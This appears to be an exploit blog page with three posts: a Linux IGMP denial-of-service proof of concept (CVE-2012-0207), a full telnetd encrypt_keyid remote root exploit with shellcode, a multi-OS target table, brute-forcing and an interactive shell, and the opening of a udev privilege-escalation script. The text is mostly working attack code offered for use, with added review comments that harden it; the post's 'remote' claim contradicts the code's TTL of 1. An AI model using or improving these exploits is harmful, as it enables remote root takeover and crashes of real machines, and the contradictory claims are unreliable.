
[DoS]: Code of the 'Undead' attack by KCOPE — but this one seems to be REMOTE, not just LAN-based. Great for learning about DoS, ICMP/IGMP/TCP/IP, packet sequences, and how little it takes to flaw one.

Posted on 18th January 2012 in Codes, Exploits

I'll just put the plain (admittedly crappy) PoC up, which was on the FD list. Right or wrong, the claim is that this can attack OUTSIDE the LAN or WLAN :P — note, though, that as posted the code sets the IP TTL to 1 (ip->ttl = 1), so the packet is dropped at the first router and cannot reach anything beyond the local link.
So use some thinking — maybe update this post with your OWN version for a change.
Go hard… I will have a closer look when I have more time, but I know that my exploit for Windows is set up in a similar fashion, and that is simply because of the way the IGMP/ICMP membership code reads things: the group had to be at least 0.0.0.0; localhost would fail, as that is an actual IP… so, I guess, good luck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** This code is NOT kcope's. It is based more on the IGMPv3 membership-query bug, which was for Windows but also affects Linux (in IGMPv3), go figure. It can easily be turned into a very fast packet generator, and since it does not care what the IPs are, results could presumably be seen remotely (but see the TTL caveat: as posted, ip->ttl = 1). Feel free to update / send a comment — all comments go through ME before any publishing, so be sure the code is safe; I only put corrected code here. So please don't add it to your lame DoS collection, because I'll just mess it up — and anyway the packet is easy to block now that it is released, right?
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

/*
 * Hand-rolled IPv4 header, used instead of the one in <netinet/ip.h>.
 * It is 28 bytes because of the two trailing option words, which is why
 * main() sets ihl = 7 (7 * 4 = 28).  main() zeroes both option words
 * (option type 0 is End of Option List).  Bit-field packing order is
 * implementation-defined; "ihl first, then version" gives the expected wire
 * layout on the little-endian hosts this PoC was presumably written on.
 */
struct iphdr {
  unsigned char ihl:4, version:4, tos;   /* header length in 32-bit words, IP version, type of service */
  unsigned short tot_len, id, frag_off;  /* total length, identification, flags + fragment offset (network order) */
  unsigned char ttl, protocol;           /* hop limit (main() uses 1) and IPPROTO_IGMP */
  unsigned short check;                  /* header checksum */
  unsigned int saddr, daddr;             /* source / destination address, network order */
  unsigned int options1;                 /* two option words, zeroed by main() */
  unsigned int options2;
};

/*
 * IGMP message placed directly after the IP header.  The 8-byte prefix
 * (type, max-response time, checksum, group address) is the classic
 * membership-query layout; type 0x11 is a membership query.  `padding` is
 * extra zeroed space so that main() can checksum and send a 12-byte message
 * for its second packet without reading past the struct.
 */
struct igmp_query {
        unsigned char type;         /* 0x11 = membership query in main() */
        unsigned char maxresponse;  /* 0xff for the first packet, 0 for the second */
        unsigned short csum;        /* ones'-complement checksum, computed with the field zeroed */
        unsigned int mcast;         /* group address; main() uses 0.0.0.0 */
        char padding[40];           /* zero-filled tail, covered by the 12-byte checksum of packet two */
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

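unsigned short in_chksum(unsigned short *addr, int len);

/*
 * Standard ones'-complement Internet checksum (RFC 1071 style) over `len`
 * bytes starting at `addr`; used here for both the IP and the IGMP header.
 *
 * The data is summed as 16-bit words in host byte order and the result is
 * returned without byte swapping, which is what makes it correct to store
 * the return value straight into a header field that is otherwise kept in
 * network byte order.  A trailing odd byte is folded in through the
 * low-address byte of a zeroed 16-bit word, so odd lengths behave the same
 * on either endianness.  A non-positive `len` yields 0xffff (the checksum of
 * empty data).  Callers must pass a readable buffer of `len` bytes.
 *
 * Change from the original: the running sum is unsigned, so a very long
 * buffer cannot overflow a signed int (undefined behaviour); results are
 * identical for every length this program uses.
 */
unsigned short in_chksum(unsigned short *addr, int len) {
   unsigned int sum = 0;
   int nleft = len;

   /* Sum whole 16-bit words. */
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }

   /* Fold in a trailing odd byte, zero-padded on the high-address side. */
   if (nleft == 1) {
      unsigned short last = 0;
      *(unsigned char *)&last = *(unsigned char *)addr;
      sum += last;
   }

   /* Fold the carries back into 16 bits; two rounds suffice for a 32-bit sum. */
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   return (unsigned short)~sum;
}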

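long resolve(char *);

/*
 * Resolve `host` (dotted quad or host name) to an IPv4 address in network
 * byte order, returned zero-extended in a `long`; returns -1 on failure.
 *
 * Only AF_INET answers of exactly 4 bytes are accepted, so an unexpected
 * h_length can no longer write past the destination (the original memcpy'd
 * h_length bytes into a long and, on 64-bit hosts, left the upper half
 * uninitialised).  NOTE(review): once a caller narrows the result to 32
 * bits, -1 becomes 255.255.255.255, so the -1 check must happen before the
 * narrowing.  gethostbyname(3) is obsolete; getaddrinfo(3) is the modern
 * replacement, kept out here to avoid changing the file's dependencies.
 */
long resolve(char *host) {
  struct hostent *hst;
  in_addr_t a4;

  hst = gethostbyname(host);
  if (hst == NULL || hst->h_addrtype != AF_INET ||
      hst->h_length != (int)sizeof(a4) || hst->h_addr_list[0] == NULL)
    return(-1);
  memcpy(&a4, hst->h_addr_list[0], sizeof(a4));
  return((long)a4);
}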

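/*
 * Entry point: ./undeadattack SRC_IP DST_IP
 *
 * Builds a raw IPv4 packet (28-byte header with two zeroed option words,
 * ihl = 7) carrying an IGMP membership query (type 0x11) for group 0.0.0.0
 * and sends it twice, exactly as the original PoC did: first as an 8-byte
 * IGMP message with max-response 0xff, then as a 12-byte message with
 * max-response 0.  Needs CAP_NET_RAW (root) for the raw socket.
 *
 * Fixes over the original: unresolvable arguments are reported instead of
 * being sent as 255.255.255.255 (resolve() returns -1, which the original
 * never checked); the IP checksum is computed after saddr/daddr and the
 * option words are filled in rather than before; the second packet's
 * tot_len goes through htons() like the first; one socket is reused and
 * closed on every path.  On Linux the kernel rewrites tot_len and the IP
 * checksum for IPPROTO_RAW sockets anyway (see raw(7)), so those two were
 * latent rather than visible bugs there.
 *
 * NOTE(review): ttl is 1, so as written the packet cannot cross a router;
 * the post's "attacks outside the LAN" claim is not borne out by this code.
 */
int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s;
  char buf[1500];

  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv);
    return(1);
  }
  saddr = resolve(argv[1]);
  daddr = resolve(argv[2]);
  if (saddr == -1 || daddr == -1) {
    fprintf(stderr, "Could not resolve %s\n", saddr == -1 ? argv[1] : argv[2]);
    return(1);
  }

  memset(buf, 0, sizeof(buf));
  ip = (struct iphdr *)buf;
  igmp = (struct igmp_query *)&buf[sizeof(struct iphdr)];

  memset(&dst, 0, sizeof(dst));
  dst.sin_family = AF_INET;
  dst.sin_addr.s_addr = (in_addr_t)daddr;

  /* IP header: 28 bytes (ihl = 7) including the two zeroed option words. */
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off = 0;
  ip->ttl = 1;                 /* link-local only: see NOTE above */
  ip->protocol = IPPROTO_IGMP;
  ip->saddr = (in_addr_t)saddr;
  ip->daddr = (in_addr_t)daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  ip->check = 0;               /* checksum is computed with the field zeroed */
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));

  /* First IGMP message: query, max-response 0xff, group 0.0.0.0, 8 bytes. */
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast = inet_addr("0.0.0.0");
  igmp->csum = 0;
  igmp->csum = in_chksum((unsigned short *)igmp, 8);

  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1) {
    perror("socket");
    return(1);
  }
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
  if (sendto(s, buf, sizeof(struct iphdr)+8, 0, (struct sockaddr *)&dst, sizeof(dst)) == -1) {
    perror("Error sending packet");
    close(s);
    exit(-1);
  }

  /* Second message: same query with max-response 0; 12 bytes summed/sent. */
  ip->id = htons(18278);
  ip->tot_len = htons(sizeof(struct iphdr)+12);
  ip->check = 0;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast = inet_addr("0.0.0.0");
  igmp->csum = 0;
  igmp->csum = in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
  if (sendto(s, buf, sizeof(struct iphdr)+12, 0, (struct sockaddr *)&dst, sizeof(dst)) == -1) {
    perror("Error sending packet");
    close(s);
    exit(-1);
  }
  close(s);
  return(0);
}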

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous 'targets' copy I was apparently keeping from everyone… enjoy (with targets — and even addable targets)!

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Success reading initial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to trigger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most inetd implementations have a connection-rate limit (commonly
 * expressed per minute), so change this delay if you start getting
 * errors reading responses:
 *  - for 60 connections per minute  900000
 *  - for 40 connections per minute 1500000
 *  - for no limit 300000 should work
 */
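#define BRUTE_TOUT 600000  /* microseconds to usleep() between brute-force attempts; see the rate-limit note above */
/* Size of the keyid buffer in the overwritten key_info image: 63 bytes.
 * Parenthesised (the original was a bare `64-1`, which expands wrongly inside
 * any larger expression).  NOTE(review): main() sends the keyid suboption
 * prefix with sizeof(), which counts the literal's NUL, so 64 bytes precede
 * the keylen field on the wire -- presumably matching the server's buffer. */
#define MAXKEYLEN (64-1)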

/*
 * Byte image of the server-side key_info record that this exploit
 * overwrites: the keyid buffer followed by what the server treats as
 * keylen, dir, the modep pointer and the getcrypt function pointer, 4 bytes
 * each (i.e. 32-bit targets).  main() fills keyid with 0x90 plus shellcode,
 * puts "DEAD"/"BEEF" in keylen/dir and the chosen address in both modep
 * ("readable address") and getcrypt ("function pointer").
 * NOTE(review): the real server-side layout is not shown in this file; the
 * field roles are taken from the comments in main().
 */
struct key_info {
  unsigned char keyid[MAXKEYLEN];  /* NOP sled + shellcode */
  unsigned char keylen[4];         /* overwritten with "DEAD" */
  unsigned char dir[4];            /* overwritten with "BEEF" */
  unsigned char modep[4];          /* must point at readable memory */
  unsigned char getcrypt[4];       /* function pointer the server later calls */
};
/*
 * One entry of targets[]: `skip` is both the number of 0x90 bytes placed in
 * front of the shellcode inside keyid and the step main() uses when walking
 * addresses during brute force; `address` is the 4-byte target address
 * copied verbatim into the payload (so it is written in the target's own
 * byte order); `desc` is what usage() prints; `shellcode` is copied with
 * strlen(), so it must not contain a 0x00 byte.
 * NOTE(review): uint32_t comes from <stdint.h>, which this file does not
 * include directly (it arrives via the socket headers on glibc).
 */
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86: setuid(0) through syscall 0x17, then
 * execve("//bin/sh", {"//bin/sh", NULL}, NULL) through syscall 0x3b.
 * Contains no NUL bytes (main() copies it with strlen). */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 (21 bytes, no NULs): xor ecx,ecx; mul ecx (eax=edx=0);
 * push ecx; push "//sh"; push "/bin"; mov ebx,esp; mov al,0x0b; int 0x80
 * -> execve("/bin//sh", NULL, NULL). */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc: builds "/bin/sh" plus a NULL-terminated argv on
 * the stack and issues syscall 0x3b (execve) via trap 0x10.  Per-instruction
 * comments are the author's; no NUL bytes, as required by strlen() copying. */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list.
 * Columns: skip (NOP-sled length and brute-force step), 4 address bytes
 * copied verbatim into the payload (the i386 entries read as 0x0805xxxx
 * little-endian), description, shellcode.  main() treats the first two
 * entries (index < 2) as brute-force targets: it walks outward from the
 * base address in steps of skip-1 until checkmagic() sees a shell.  Every
 * other entry gets a single attempt followed by an interactive shell().
 * The NULL entry terminates the table for usage()/main().
 * NOTE(review): the FreeBSD 8.0 and 8.1 entries carry the same address. */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands.
 * NOTE(review): these are string literals and attack()/main() send them with
 * sizeof(), which counts the terminating NUL -- so 17, 5 and 3 bytes go on
 * the wire, not 16, 4 and 2.  For the keyid template the extra 0x00 sits in
 * front of the 63-byte keyid (MAXKEYLEN is 64-1), making 64 bytes before the
 * keylen field; that looks deliberate, so do not "fix" the sizeof() without
 * re-checking the server-side layout. */
/* IAC SB ENCRYPT IS DES_CFB64 CFB64_IV <8 IV bytes 0x12..0x19> IAC SE */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

/* IAC SB ENCRYPT ENC_KEYID -- start of the keyid suboption that overflows */
static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
/* IAC SE */
static unsigned char tnet_end_suboption[] = "\xff\xf0";

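/*
 * Probe whether a shell is answering on `fd`: send "echo foo\n" and look for
 * "foo" in the reply.  Returns 0 on success, -1 when the write or read fails,
 * the peer has closed, or the reply lacks the marker.
 *
 * Fix: the reply is NUL-terminated before strstr() runs.  The original
 * handed a raw 32-byte buffer to strstr(), which read past the end of `got`
 * whenever the reply filled it.  As before, a single read() is assumed to
 * return the whole echo.
 */
static int checkmagic (int fd) {
  char got[32];
  ssize_t n;

  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  n = read (fd, got, sizeof got - 1);
  if (n <= 0)
    return -1;
  got[n] = '\0';
  return strstr (got, "foo") ? 0 : -1;
}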

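/*
 * Minimal interactive relay: sends "id\n" so the uid shows up, then copies
 * bytes between stdin/stdout and `fd` until the remote side goes away or an
 * I/O call fails.
 *
 * Fix: read() returning 0 is now handled.  The original only broke out on a
 * negative return, so once the peer closed the socket select() reported it
 * readable forever and the loop spun at full CPU; likewise EOF on stdin kept
 * being "read" and echoed as zero-byte writes.  A closed socket now ends the
 * session; EOF on stdin just stops polling stdin (so piped commands still
 * get their output).  `fd` must be below FD_SETSIZE for select().
 */
static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    int stdin_open = 1;

    /* check uid */
    if (write(fd, "id\n", 3) < 0) {
        perror("write");
        return;
    }
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        if (stdin_open)
            FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* remote -> stdout */
        if (FD_ISSET(fd, &fds)) {
            n = read(fd, tmp, sizeof(tmp));
            if (n <= 0) {              /* error, or peer closed the connection */
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* stdin -> remote */
        if (stdin_open && FD_ISSET(0, &fds)) {
            n = read(0, tmp, sizeof(tmp));
            if (n < 0) {
                perror("read");
                break;
            }
            if (n == 0) {              /* EOF on stdin: nothing more to send */
                stdin_open = 0;
                continue;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}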

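/*
 * Open a TCP connection to dip (IPv4, network byte order) on dport with an
 * 8-second send/receive timeout on the socket.  Returns the connected fd,
 * or -1: after printing the reason when socket() fails, silently (errno
 * preserved for the caller) when connect() fails.  `dport` is truncated to
 * 16 bits by htons(); the caller is expected to validate the range.
 *
 * Fixes: the sockaddr_in is zeroed before use (the original left sin_zero
 * uninitialised) and errno from a failed connect() survives the close().
 * Failed setsockopt() calls are reported but not fatal, as before.
 */
static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   int saved_errno;
   struct sockaddr_in cdata;
   struct timeval timeout;

   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;

   memset(&cdata, 0, sizeof(cdata));
   cdata.sin_family = AF_INET;
   cdata.sin_port = htons(dport);
   cdata.sin_addr.s_addr = dip;

   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if (pconn < 0) {
      printf("Socket error: %i\n", pconn);
      printf("Err message: %s\n", strerror(errno));
      return (-1);
   }
   /* Bound every read/write so a wedged target cannot stall the brute-force loop. */
   if (setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO, (void *)&timeout, sizeof(struct timeval)) != 0)
      perror("setsockopt SO_RCVTIMEO: ");
   if (setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO, (void *)&timeout, sizeof(struct timeval)) != 0)
      perror("setsockopt SO_SNDTIMEO: ");

   if (connect(pconn, (struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
      saved_errno = errno;
      close(pconn);
      errno = saved_errno;
      return -1;
   }
   return pconn;
}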

/* Print the numbered target list (1-based, which is what main() expects on
 * the command line) followed by the usage line.  `arg` is argv[0]. */
static void usage(char *arg) {
    const struct target_profile *entry;
    int number;

    printf("Available Targets:\n\n");
    for (entry = targets, number = 1; entry->address != NULL; entry++, number++)
        printf("  %2i: %s\n", number, entry->desc);
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

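/*
 * Run the encrypt_keyid exchange once against ip:port.
 *   1. read the server's initial negotiation,
 *   2. send tnet_init_enc (encryption mode + IV) and read the reply,
 *   3. send `payload` (the oversized keyid suboption, psize bytes) to
 *      overwrite the server-side key_info fields and read the reply,
 *   4. send it again so the overwritten function pointer gets called.
 * With `tryshell` non-zero the socket is handed to shell(); otherwise
 * checkmagic() probes for a shell and the result is printed.  Returns 0 on
 * success, -1 on any failure.  The bytes sent are unchanged from the
 * original, including the NUL terminators that sizeof() counts.
 *
 * Fixes: a read() that returns 0 (server closed -- typically a crashed
 * target during brute force) or fails with anything but a timeout now ends
 * the attempt instead of being reported as "-1 bytes read" and followed by
 * writes into a dead socket; ret/psize are compared without the
 * signed/unsigned mismatch; cleanup goes through a single exit path.
 */
int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;

  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
    printf("[-] Error connecting: %i\n", errno);
    return -1;
  }

  /* 1. Initial server request */
  ret = read(conn, readbuf, sizeof readbuf);
  if (ret <= 0) {
    printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
    goto fail;
  }
  printf("[<] Success reading intial server request %i bytes ..\n", ret);

  /* 2. Encryption mode + IV (17 bytes: sizeof includes the literal's NUL) */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != (int)sizeof(tnet_init_enc)) {
    printf("[-] Error sending init encryption: %i\n", ret);
    goto fail;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");

  ret = read(conn, readbuf, sizeof readbuf);
  if (ret == -1 && errno == EAGAIN) {
    printf ("[!] Timeout when receiving response\n");
    goto fail;
  }
  if (ret <= 0) {
    printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "connection closed");
    goto fail;
  }
  printf("[<] Server response: %i bytes read\n", ret);

  /* 3. First copy of the oversized keyid: overwrites the key_info fields */
  ret = write(conn, payload, psize);
  if (ret < 0 || (unsigned int)ret != psize) {
    printf("[-] Error sending payload first time\n");
    goto fail;
  }
  printf("[>] First payload to overwrite function pointer sent\n");

  ret = read(conn, readbuf, sizeof readbuf);
  if (ret == -1 && errno == EAGAIN) {
    printf ("[!] Timeout when receiving response ..\n");
    goto fail;
  }
  if (ret <= 0) {
    printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "connection closed");
    goto fail;
  }
  printf("[<] Server response: %i bytes read\n", ret);

  /* 4. Second copy: the overwritten getcrypt pointer is now called */
  ret = write(conn, payload, psize);
  if (ret < 0 || (unsigned int)ret != psize) {
    printf("[-] Error sending payload second time ..\n");
    goto fail;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");

  if (tryshell) {
    /* Start the semi interactive shell */
    printf("[*] Got root?\n");
    shell(conn);
    ret = 0;
  } else {
    printf ("[*] Does this work? ");
    /* Just check if it works */
    if (checkmagic (conn) == 0) {
      printf ("YES!\n");
      printf ("Add the Target address to the targets list & recomple!\n");
      ret = 0;
    } else {
      printf ("[-] Nope,try again ..\n");
      ret = -1;
    }
  }
  close (conn);
  return ret;

fail:
  close (conn);
  return -1;
}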

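/*
 * Entry point: ./exploit <IP> <Port> <Target>
 *
 * Builds the key_info image (0x90 sled, shellcode at offset `skip`,
 * "DEAD"/"BEEF" markers in keylen/dir, the candidate address in modep and
 * getcrypt), wraps it in the ENC_KEYID suboption and hands it to attack().
 * Targets 1 and 2 (index < 2) are brute-forced: the loop keeps going,
 * BRUTE_TOUT microseconds apart, until attack() returns 0; every other
 * target gets one attempt with an interactive shell on success.  Each
 * iteration moves the candidate address outward from the table's base,
 * alternating below and above it in steps of (skip - 1), presumably so a
 * hit anywhere in the sled still reaches the shellcode.
 *
 * Fixes: the 1-based target number is validated before it indexes
 * targets[] (0 or an out-of-range value used to read past the table), the
 * port is range-checked once instead of being re-parsed every iteration,
 * and the sled + shellcode are checked to fit inside keyid so a user-added
 * target cannot silently overwrite the keylen/dir fields.
 */
int main(int argc, char *argv[]) {
  int offset = 0;
  int target, ntargets, port;
  int i;
  unsigned int address;
  /* Payload size: ENC_KEYID prefix + key_info image + IAC SE, each sizeof()
   * including the string literal's NUL byte, as in the original. */
  int psize = (sizeof(struct key_info) +
               sizeof(tnet_option_enc_keyid) +
               sizeof(tnet_end_suboption));
  struct key_info bad_struct;
  unsigned char payload[psize];
  struct target_profile *t;

  if (argc != 4) {
    usage(argv[0]);
    return -1;
  }

  for (ntargets = 0; targets[ntargets].address != NULL; ntargets++)
    ;
  target = atoi(argv[3]) - 1;
  if (target < 0 || target >= ntargets) {
    printf("[-] Invalid target '%s' (expected 1..%i)\n\n", argv[3], ntargets);
    usage(argv[0]);
    return -1;
  }
  port = atoi(argv[2]);
  if (port < 1 || port > 65535) {
    printf("[-] Invalid port '%s'\n", argv[2]);
    return -1;
  }
  t = &targets[target];
  if (t->skip + strlen(t->shellcode) > sizeof(bad_struct.keyid)) {
    printf("[-] Shellcode for target %i does not fit in keyid\n", target + 1);
    return -1;
  }
  printf("Target: %s\n\n", t->desc);

  /* Fill the structure: sled everywhere, markers in keylen/dir */
  memset(&bad_struct, 0x90, sizeof(struct key_info));
  memcpy(bad_struct.keylen,   "DEAD", 4);
  memcpy(bad_struct.dir,      "BEEF", 4);

  for (i = 0; !i || target < 2; i++) {
    offset = 0;
    memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
    memcpy(&address, t->address, 4);
    /* i = 0: base; then base - d, base + d, base - 2d, ... with d = skip - 1 */
    address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
    printf("[*] Target address: 0x%04x\n", address);
    memcpy(bad_struct.modep, &address, 4);    /* Readable address */
    memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */

    /* Prepare the payload with the overflow */
    memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
    offset += sizeof(tnet_option_enc_keyid);
    memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
    offset += sizeof(bad_struct);
    memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));

    if (attack(argv[1], port, payload, psize, target >= 2) == 0)
      break;
    usleep(BRUTE_TOUT);
  }
  return 0;
}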

ENJOY! The ‘pvt’ socalled version ;)
XD

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV: kcope's version and the underground bash version — have fun.
XD / #HAXNET

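#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# NOTE(review): the posted copy of this script had lost the here-document
# wrappers around its embedded C sources -- only "cat > prog.c << _EOF"
# survived, without its closing _EOF, and the ud.c / acc.c wrappers were
# gone entirely -- so a shell would have tried to run the C lines as
# commands.  They are restored below with the same _EOF delimiter (quoted,
# so nothing inside the C is expanded; none of it needs expansion).
# Other review changes: the netlink pid is required up front (ud.c used to
# dereference argv[1] unchecked), main() in ud.c has an explicit int return
# type, acc.c includes <unistd.h> and passes a real null pointer as the
# execl() sentinel (a bare 0 is an int, which is undefined for a variadic
# call on 64-bit ABIs), and the two builds whose output is executed are
# checked.
#
# What the posted code does: ud.c forges an "add" uevent for block device
# 8:1 (with REMOVE_CMD set) and sends it to the udevd netlink socket whose
# port id is given as the first argument -- vulnerable udevd versions did
# not check that uevents came from the kernel -- waits 10 s, then runs
# /tmp/acc, a setgid(0)/setuid(0) + /bin/sh helper built further down.
# The slib_ex.so.1.0 LD_PRELOAD library is built and copied to /tmp, but
# nothing shown here loads it; how /tmp/acc is meant to become setuid-root
# is not visible in this listing.

if [ -z "$1" ]
then
echo "Usage: $0 <netlink pid of udevd, see /proc/net/netlink>"
exit 1
fi

cat > ud.c << '_EOF'
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
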